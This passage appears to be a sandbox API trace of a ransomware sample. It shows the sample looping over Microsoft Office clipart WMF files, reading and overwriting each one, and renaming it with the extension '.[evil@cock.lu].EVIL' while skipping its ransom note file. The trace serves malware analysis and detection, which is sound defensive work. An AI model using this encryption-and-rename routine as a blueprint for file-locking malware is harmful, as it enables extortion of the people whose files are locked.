??_V@YAXPEAX@Z () returned 0x1 [0170.155] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01561_.WMF", dwFileAttributes=0x200) returned 0 [0170.155] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.155] wcsstr (_Str="SO01563_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.155] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01563_.WMF") returned 69 [0170.155] wcscmp (_String1="SO01563_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.155] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO01563_.WMF") returned 0x0 [0170.155] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01563_.WMF") returned 0x45 [0170.155] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01563_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01563_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.158] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x75ca, lpOverlapped=0x0) returned 1 [0170.166] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.166] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.166] _errno () returned 0x84b1160840 [0170.167] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.167] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x75e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x75e0, lpOverlapped=0x0) returned 1 [0170.167] CloseHandle (hObject=0x1a8) returned 1 [0170.167] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01563_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.167] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.167] __uncaught_exception () returned 0x84b1160800 [0170.167] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.168] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01563_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01563_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01563_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01563_.wmf.[evil@cock.lu].evil")) returned 1 [0170.169] ??_V@YAXPEAX@Z () returned 0x1 [0170.173] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01563_.WMF", dwFileAttributes=0x200) returned 0 [0170.173] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.173] wcsstr (_Str="SO01566_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.173] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01566_.WMF") returned 69 [0170.173] wcscmp (_String1="SO01566_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.173] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO01566_.WMF") returned 0x0 [0170.173] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01566_.WMF") returned 0x45 [0170.173] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01566_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01566_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.176] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x51a8, lpOverlapped=0x0) returned 1 [0170.185] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.185] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.185] _errno () returned 0x84b1160840 [0170.186] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.186] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x51c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x51c0, lpOverlapped=0x0) returned 1 [0170.186] CloseHandle (hObject=0x1a8) returned 1 [0170.186] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01566_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.186] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.186] __uncaught_exception () returned 0x84b1160800 [0170.186] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.187] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01566_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01566_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01566_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01566_.wmf.[evil@cock.lu].evil")) returned 1 [0170.188] ??_V@YAXPEAX@Z () returned 0x1 [0170.191] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01566_.WMF", dwFileAttributes=0x200) returned 0 [0170.192] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.192] wcsstr (_Str="SO01568_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.192] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01568_.WMF") returned 69 [0170.192] wcscmp (_String1="SO01568_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.192] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO01568_.WMF") returned 0x0 [0170.192] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01568_.WMF") returned 0x45 [0170.192] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01568_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01568_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.194] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x54b0, lpOverlapped=0x0) returned 1 [0170.202] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.202] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.202] _errno () returned 0x84b1160840 [0170.202] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.202] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x54c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x54c0, lpOverlapped=0x0) returned 1 [0170.202] CloseHandle (hObject=0x1a8) returned 1 [0170.202] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01568_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.203] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.203] __uncaught_exception () returned 0x84b1160800 [0170.203] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.203] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01568_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01568_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01568_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01568_.wmf.[evil@cock.lu].evil")) returned 1 [0170.204] ??_V@YAXPEAX@Z () returned 0x1 [0170.207] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01568_.WMF", dwFileAttributes=0x200) returned 0 [0170.207] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.207] wcsstr (_Str="SO01569_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.207] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01569_.WMF") returned 69 [0170.207] wcscmp (_String1="SO01569_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.207] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO01569_.WMF") returned 0x0 [0170.207] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01569_.WMF") returned 0x45 [0170.207] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01569_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01569_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.210] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x47a0, lpOverlapped=0x0) returned 1 [0170.217] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.217] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.217] _errno () returned 0x84b1160840 [0170.217] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.217] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x47c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x47c0, lpOverlapped=0x0) returned 1 [0170.217] CloseHandle (hObject=0x1a8) returned 1 [0170.217] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01569_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.217] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.217] __uncaught_exception () returned 0x84b1160800 [0170.217] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.218] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01569_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01569_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01569_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01569_.wmf.[evil@cock.lu].evil")) returned 1 [0170.219] ??_V@YAXPEAX@Z () returned 0x1 [0170.221] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01569_.WMF", dwFileAttributes=0x200) returned 0 [0170.221] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.221] wcsstr (_Str="SO01575_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.221] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01575_.WMF") returned 69 [0170.221] wcscmp (_String1="SO01575_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.222] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO01575_.WMF") returned 0x0 [0170.222] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01575_.WMF") returned 0x45 [0170.222] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01575_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01575_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.223] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa8a6, lpOverlapped=0x0) returned 1 [0170.231] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.231] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.231] _errno () returned 0x84b1160840 [0170.231] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.231] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xa8c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa8c0, lpOverlapped=0x0) returned 1 [0170.231] CloseHandle (hObject=0x1a8) returned 1 [0170.231] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01575_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.231] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.231] __uncaught_exception () returned 0x84b1160800 [0170.231] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.232] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01575_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01575_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01575_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01575_.wmf.[evil@cock.lu].evil")) returned 1 [0170.233] ??_V@YAXPEAX@Z () returned 0x1 [0170.237] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01575_.WMF", dwFileAttributes=0x200) returned 0 [0170.237] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.237] wcsstr (_Str="SO01777_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.237] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01777_.WMF") returned 69 [0170.237] wcscmp (_String1="SO01777_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.237] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO01777_.WMF") returned 0x0 [0170.237] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01777_.WMF") returned 0x45 [0170.237] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01777_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01777_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.240] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2566, lpOverlapped=0x0) returned 1 [0170.248] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.248] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.248] _errno () returned 0x84b1160840 [0170.248] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.248] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2580, lpOverlapped=0x0) returned 1 [0170.248] CloseHandle (hObject=0x1a8) returned 1 [0170.249] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01777_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.249] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.249] __uncaught_exception () returned 0x84b1160800 [0170.249] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.249] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01777_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01777_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01777_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01777_.wmf.[evil@cock.lu].evil")) returned 1 [0170.250] ??_V@YAXPEAX@Z () returned 0x1 [0170.255] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01777_.WMF", dwFileAttributes=0x200) returned 0 [0170.255] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.255] wcsstr (_Str="SO01785_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.255] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01785_.WMF") returned 69 [0170.255] wcscmp (_String1="SO01785_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.255] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO01785_.WMF") returned 0x0 [0170.255] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01785_.WMF") returned 0x45 [0170.255] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01785_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01785_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.258] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6ca8, lpOverlapped=0x0) returned 1 [0170.265] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.265] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.265] _errno () returned 0x84b1160840 [0170.265] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.265] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x6cc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6cc0, lpOverlapped=0x0) returned 1 [0170.265] CloseHandle (hObject=0x1a8) returned 1 [0170.265] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01785_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.266] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.266] __uncaught_exception () returned 0x84b1160800 [0170.266] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.266] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01785_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01785_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01785_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01785_.wmf.[evil@cock.lu].evil")) returned 1 [0170.267] ??_V@YAXPEAX@Z () returned 0x1 [0170.269] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01785_.WMF", dwFileAttributes=0x200) returned 0 [0170.270] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.270] wcsstr (_Str="SO01805_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.270] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01805_.WMF") returned 69 [0170.270] wcscmp (_String1="SO01805_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.270] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO01805_.WMF") returned 0x0 [0170.270] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01805_.WMF") returned 0x45 [0170.270] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01805_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01805_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.272] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1088, lpOverlapped=0x0) returned 1 [0170.278] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.278] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.278] _errno () returned 0x84b1160840 [0170.278] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.278] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x10a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x10a0, lpOverlapped=0x0) returned 1 [0170.279] CloseHandle (hObject=0x1a8) returned 1 [0170.279] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01805_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.279] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.279] __uncaught_exception () returned 0x84b1160800 [0170.279] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.279] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01805_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01805_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01805_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01805_.wmf.[evil@cock.lu].evil")) returned 1 [0170.280] ??_V@YAXPEAX@Z () returned 0x1 [0170.283] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01805_.WMF", dwFileAttributes=0x200) returned 0 [0170.283] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.283] wcsstr (_Str="SO01905_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.283] _snwprintf 